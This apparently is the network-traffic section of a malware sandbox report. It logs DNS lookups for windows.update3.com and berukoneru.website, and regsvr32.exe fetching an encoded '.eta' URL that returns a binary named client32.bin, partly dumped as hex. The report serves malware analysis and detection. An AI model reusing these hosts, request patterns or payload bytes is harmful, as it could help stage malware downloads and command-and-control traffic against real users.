                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Dec 14, 2021 10:33:56.164990902 CET8.8.8.8192.168.2.50xc7cNo error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                          Dec 14, 2021 10:33:56.164990902 CET8.8.8.8192.168.2.50xc7cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.164990902 CET8.8.8.8192.168.2.50xc7cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.164990902 CET8.8.8.8192.168.2.50xc7cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.382654905 CET8.8.8.8192.168.2.50xce4aNo error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                          Dec 14, 2021 10:33:56.382654905 CET8.8.8.8192.168.2.50xce4aNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.382654905 CET8.8.8.8192.168.2.50xce4aNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.382654905 CET8.8.8.8192.168.2.50xce4aNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.444000959 CET8.8.8.8192.168.2.50xcd9eNo error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                          Dec 14, 2021 10:33:56.444000959 CET8.8.8.8192.168.2.50xcd9eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.444000959 CET8.8.8.8192.168.2.50xcd9eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.444000959 CET8.8.8.8192.168.2.50xcd9eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.753909111 CET8.8.8.8192.168.2.50x8d48No error (0)windows.update3.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                          Dec 14, 2021 10:33:56.753909111 CET8.8.8.8192.168.2.50x8d48No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.219.227.107A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.753909111 CET8.8.8.8192.168.2.50x8d48No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.124.139A (IP address)IN (0x0001)
                          Dec 14, 2021 10:33:56.753909111 CET8.8.8.8192.168.2.50x8d48No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.20.161.64A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:06.988746881 CET8.8.8.8192.168.2.50x7b27No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.205163956 CET8.8.8.8192.168.2.50x769bNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.262615919 CET8.8.8.8192.168.2.50x2011No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.448971033 CET8.8.8.8192.168.2.50xf508No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.596787930 CET8.8.8.8192.168.2.50xfaNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.804882050 CET8.8.8.8192.168.2.50x2a7cNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.811239958 CET8.8.8.8192.168.2.50x714bNo error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:07.826984882 CET8.8.8.8192.168.2.50x6f61No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:08.285397053 CET8.8.8.8192.168.2.50x72a8No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:08.340738058 CET8.8.8.8192.168.2.50x80a1No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:08.445041895 CET8.8.8.8192.168.2.50xf677No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)
                          Dec 14, 2021 10:34:08.812880993 CET8.8.8.8192.168.2.50xb228No error (0)berukoneru.website79.110.52.144A (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • berukoneru.website

                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.54979579.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:07 UTC0OUTGET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:07 UTC0INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 213639
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=qetl3urna05fer0cu0uej8os80; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:07 UTC0INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                          Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                          2021-12-14 09:34:07 UTC16INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                          Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                          2021-12-14 09:34:07 UTC32INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                          Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                          2021-12-14 09:34:07 UTC48INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                          Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                          2021-12-14 09:34:07 UTC64INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                          Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                          2021-12-14 09:34:07 UTC80INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                          Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                          2021-12-14 09:34:07 UTC96INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                          Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                          2021-12-14 09:34:07 UTC112INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                          Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                          2021-12-14 09:34:07 UTC128INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                          Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                          2021-12-14 09:34:07 UTC144INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                          Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                          2021-12-14 09:34:07 UTC160INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                          Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                          2021-12-14 09:34:07 UTC176INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                          Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                          2021-12-14 09:34:07 UTC192INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                          Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                          2021-12-14 09:34:07 UTC208INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                          Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.54979679.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:07 UTC209OUTGET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:07 UTC210INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 213639
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=703qcv2nu1i02fgfe68euftlm4; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
